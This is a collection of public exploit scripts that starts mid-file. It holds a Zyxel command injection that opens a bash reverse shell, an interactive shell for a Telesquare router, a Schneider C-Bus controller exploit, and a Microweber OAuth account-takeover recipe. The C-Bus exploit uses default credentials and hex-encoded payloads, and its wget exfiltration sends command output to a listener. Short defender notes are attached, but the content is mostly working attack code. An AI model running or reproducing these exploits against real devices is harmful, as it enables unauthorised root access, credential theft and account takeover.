def exploit(url: str, host: str, port: str) -> None:
    """POST the ``setWanPortSt`` JSON with a command injected in ``mtu``.

    Args:
        url: full handler URL (built by main()).
        host, port: where the injected ``bash -i`` connects back to.
    TLS verification is disabled (``verify=False``) and the request has a
    5 s timeout. Outcome reporting lives in the ``finally`` block: when the
    POST returns, ``response`` exists and the status code is printed as a
    failure; on the timeout/Ctrl-C path ``sys.exit(1)`` is raised first,
    ``response`` is then unbound inside ``finally``, and the resulting
    NameError is caught by the bare ``except`` which prints the success
    message — i.e. "the request hung" is treated as "the shell connected".

    Defender's note: the signature is an unauthenticated POST to
    ``/ztp/cgi-bin/handler`` with ``command: setWanPortSt`` and shell
    metacharacters in ``mtu`` (CVE-2022-30525); block the ZTP handler from
    untrusted networks and apply the vendor fix.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }
    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        # See docstring: NameError on `response` is the "success" path here.
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)
        except:
            print("[!] Enjoy your shell !!!")
# Script entry point.
if __name__ == "__main__":
    main()
#!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No
import requests
import argparse
import sys
from xml.etree import ElementTree
def sysArgument() -> str:
    """Parse the command line and return the required ``--host`` value."""
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", required=True, help="target hostname/IP")
    args = vars(ap.parse_args())
    return args['host']
def checkHost(host: str) -> None:
    """GET ``http://<host>`` and print whether it answered.

    Only ``requests.exceptions.Timeout`` is handled (converted to
    SystemExit); any other connection error propagates. The response itself
    is not inspected.
    """
    url = "http://" + host
    print("[*] Checking host is it alive?")
    try:
        rsl = requests.get(url)
        print("[*] The host is alive.")
    except requests.exceptions.Timeout as err:
        raise SystemExit(err)
def exploit(host: str) -> None:
    """Drive ``/cgi-bin/admin.cgi?Command=sysCommand&Cmd=`` interactively.

    Flow: one GET to the bare endpoint (expects 200), a test with ``id``
    whose XML reply is streamed and every ``<CmdResult>`` text collected,
    then a read-eval loop that appends raw user input to the URL (no
    encoding) and prints each ``CmdResult``. ``.exit`` ends the loop. All
    exits go through ``sys.exit(0)``.

    Defender's note: any request to ``admin.cgi`` carrying
    ``Command=sysCommand`` is the indicator to alert on (CVE-2021-46422,
    no authentication required per the header); restrict management
    access to the device and apply the vendor update.
    """
    url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
    #checking does the CGI exists?
    rsl = requests.get(url)
    if(rsl.status_code == 200):
        print("[*] CGI script exist!")
        print("[*] Injecting some shell command.")
        #1st test injecting id command
        cmd = "id"
        try:
            # stream=True so iterparse() can read the XML straight off
            # the socket via rsl.raw.
            rsl = requests.get(url + cmd, stream=True)
            xmlparser = ElementTree.iterparse(rsl.raw)
            cmdRet = []
            for event, elem in xmlparser:
                if(elem.tag == 'CmdResult'):
                    cmdRet.append(elem.text)
        except:
            # Bare except: parse errors and network errors are treated alike.
            print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
            sys.exit(0)
        if(len(cmdRet) != 0):
            print("[*] There's response from the CGI script!")
            print('[*] System ID: ' + cmdRet[0].strip())
            print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
            #start shell iteration
            while(True):
                cmdInput = input("[SDT-CW3B1 Shell]# ")
                if(cmdInput == ".exit"):
                    print("[*] Exiting shell.")
                    sys.exit(0)
                rsl = requests.get(url + cmdInput, stream=True)
                xmlparser = ElementTree.iterparse(rsl.raw)
                for event, elem in xmlparser:
                    if(elem.tag == 'CmdResult'):
                        print(elem.text.strip())
                print('\n')
        else:
            print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
            sys.exit(0)
    else:
        print("[!] CGI script not found.")
        print(rsl.status_code)
        sys.exit(0)
def main() -> None:
    """Parse ``--host``, check reachability, then run exploit()."""
    host = sysArgument()
    checkHost(host)
    exploit(host)
# Script entry point.
if __name__ == "__main__":
    main()
# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit
#
#
# Vendor: Schneider Electric SE
# Product web page: https://www.se.com | https://www.clipsal.com
# Product details:
# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC
# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/
# Affected version: CLIPSAL 5500SHAC (i.MX28)
# CLIPSAL 5500NAC (i.MX28)
# SW: 1.10.0, 1.6.0
# HW: 1.0
# Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2
# SpaceLogic C-Bus
#
# Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser
# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from
# Schneider Electric. It is specifically designed to unite the C-Bus home
# automation solution with common household communication protocols, from
# lighting and climate control, to security, entertainment and energy metering.
# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems
# for residential homes or zones within a building and integrates functions
# such as heating/cooling, energy/load monitoring and remote control for C-Bus
# and Modbus.
#
# Desc: The automation controller suffers from an authenticated arbitrary
# command execution vulnerability. An attacker can abuse the Start-up (init)
# script editor and exploit the 'script' POST parameter to insert malicious
# Lua script code and execute commands with root privileges that will grant
# full control of the device.
#
# ------------------------------------------------------------------------------
# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888
# ----------------------------------------------------------------------
# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38
# [*] Starting exfiltration handler on port 8888
# [*] Writing Lua initscript... done.
# [*] Running os.execute()... done.
# [*] Got request from 192.168.0.10:33522
# [*] Printing target's request:
#
# b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user
# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption
# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:
# close\r\n\r\n"
#
# [*] Cleaning up... done.
#
# $
# ------------------------------------------------------------------------------
#
# Tested on: CPU model: ARM926EJ-S rev 5 (v5l)
# GNU/Linux 4.4.115 (armv5tejl)
# LuaJIT 2.0.5
# FlashSYS v2
# nginx
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5707
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php
#
#
# 12.03.2022
#
import threading#!
import datetime##!
import requests##!
import socket####!
import time######!
import sys#######!
import re########!
from requests.auth import HTTPBasicAuth
from time import sleep as spikaj
class Wiser:
    """PoC driver for the C-Bus automation controller initscript issue.

    Lifecycle (see main()): memo() reads argv, mtask() starts the exfil()
    listener thread and then byts() writes and runs a Lua initscript whose
    ``os.execute`` runs ``wget`` back to the listener with the command
    output in the User-Agent; exfil() prints whatever arrives, and clean()
    finally overwrites the initscript with an empty one.

    Defender's note: the two POSTs to ``/scada-main/scripting/save`` and
    ``.../run`` with ``id=initscript`` and an ``os.execute`` call in the
    ``script`` field, followed by an outbound HTTP request from the
    controller, are the observable chain; the default ``admin`` credential
    used here is the first thing to change (ZSL-2022-5707).
    """
    def __init__(self):
        # headers is filled by byts() and replaced again by clean().
        self.headers = None
        self.uri = '/scada-main/scripting/'
        self.savs = self.uri + 'save'
        self.runs = self.uri + 'run'
        self.start = datetime.datetime.now()
        self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')
        # Hard-coded vendor default credential.
        self.creds = HTTPBasicAuth('admin', 'admin123')
    def memo(self):
        """Read target, command, listener host and port from argv.

        Prints usage and exits unless exactly four arguments are given.
        A target lacking the text ``http`` is prefixed with ``http://``.
        """
        if len(sys.argv) != 5:
            self.use()
        else:
            self.target = sys.argv[1]
            self.execmd = sys.argv[2]
            self.localh = sys.argv[3]
            self.localp = int(sys.argv[4])
            if not 'http' in self.target:
                self.target = 'http://{}'.format(self.target)
    def exfil(self):
        """Listen on 0.0.0.0:localp and print each incoming request.

        Runs in the thread started by mtask(). Each accept() waits at most
        9 s; on timeout the loop ends, the socket is closed and clean() is
        called (which exits the process). Up to 2003 bytes per connection
        are read and printed raw.
        """
        print('[*] Starting exfiltration handler on port {}'.format(self.localp))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('0.0.0.0', self.localp))
        while True:
            try:
                s.settimeout(9)
                s.listen(1)
                conn, addr = s.accept()
                print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
                data = conn.recv(2003)
                print('[*] Printing target\'s request:')
                print('\n%s' %data)
            except socket.timeout as p:
                print('[!] Something\'s not right. Check your port mappings!')
                break
        s.close()
        self.clean()
    def mtask(self):
        """Start exfil() on a background thread, then run byts() here."""
        konac = threading.Thread(name='thricer.exe', target=self.exfil)
        konac.start()
        self.byts()
    def byts(self):
        """Write the Lua initscript via ``save`` and trigger it via ``run``.

        ``loada`` is the save body (the hex literals spell out the JSON
        shown in the trailing comments), ending in
        ``&script=os.execute('wget -U "`<cmd>`" <lhost>:<lport>')``; ``loadb``
        is the run body ``data={"id":"initscript"}``. Either POST exits the
        process (codes 17 / 19) if the reply lacks the text ``success``.
        """
        self.headers = {
            'Referer':self.target+'/scada-main/main/editor?id=initscript',
            'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',
            'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',
            'Content-Type':'text/plain;charset=UTF-8',
            'User-Agent':'SweetHomeAlabama/2003.59',
            'X-Requested-With':'XMLHttpRequest',
            'Accept-Language':'en-US,en;q=0.9',
            'Accept-Encoding':'gzip, deflate',
            'Sec-Ch-Ua-Platform':'"Windows"',
            'Sec-Fetch-Site':'same-origin',
            'Connection':'keep-alive',
            'Sec-Fetch-Dest':'empty',
            'Sec-Ch-Ua-Mobile':'?0',
            'Sec-Fetch-Mode':'cors',
            'Origin':self.target,
            'Accept':'*/*',
            'sec-gpc':'1'
        }
        self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",
        self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",
        self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript",
        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,
        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}
        self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute
        self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`
        self.loada += self.execmd # [command input]
        self.loada += '\x60\x22\x20' # `".
        self.loada += self.localh+':'+str(self.localp) # [listener input]
        self.loada += '\x27\x29' # ')
        self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={
        self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}
        print('[*] Writing Lua initscript... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(17)
        else:
            print('done.')
        print('[*] Running os.execute()... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(19)
        else:
            print('done.')
    def splash(self):
        """Print the ASCII-art banner."""
        Baah_loon = '''
######
##########
###### _\_
##===----[.].]
#( , _\\
# )\__|
\ /
`-._``-'
>@
|
|
|
|
| Schneider Electric C-Bus SmartHome Automation Controller
| Root Remote Code Execution Proof of Concept
| ZSL-2022-5707
|
|
|
'''
        print(Baah_loon)
    def use(self):
        """Print banner and usage line, then exit(0)."""
        self.splash()
        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
        exit(0)
    def clean(self):
        """Overwrite the initscript with an empty script and exit.

        The ``blank``..``flank`` hex pieces concatenate to the URL-encoded
        form of the same ``data={...}`` object byts() sends, but with
        ``"script":""`` — i.e. the init script is reset to empty. Exits with
        18 if the save reply lacks ``success``, otherwise with -1; this is
        the process exit for the whole run (called from exfil()).
        """
        print('\n[*] Cleaning up... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        self.headers = {'X-Requested-With':'XMLHttpRequest'}
        self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'
        self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'
        self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'
        self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'
        self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'
        self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'
        self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'
        self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'
        self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'
        self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'
        self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'
        self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
        self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'
        self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'
        self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'
        self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'
        self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'
        self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
        self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'
        self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'
        self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'
        self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'
        self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'
        self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'
        self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'
        self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'
        self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'
        htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(18)
        else:
            print('done.')
        exit(-1)
    def main(self):
        """Print the start banner line, then run memo() and mtask() in order."""
        print('-'*70)
        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
        # Tuple expression used purely to sequence the two calls.
        self.memo(), self.mtask()
# Script entry point.
if __name__ == '__main__':
    Wiser().main()
# Exploit Title: Microweber CMS 1.2.15 - Account Takeover
# Date: 2022-05-09
# Exploit Author: Manojkumar J
# Vendor Homepage: https://github.com/microweber/microweber
# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15
# Version: <=1.2.15
# Tested on: Windows10
# CVE : CVE-2022-1631
# Description:
Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth
Misconfiguration Leads To Account Takeover.
# Steps to exploit:
1. Create an account with the victim's email address.
Register endpoint: https://target-website.com/register#
2. When the victim tries to log in with a default OAuth provider such as Google,
GitHub, Microsoft, Twitter, LinkedIn, Telegram or Facebook (auth login)
using the same e-mail address as the account created in step 1, the
victim's account can be taken over with the login credentials created
in step 1.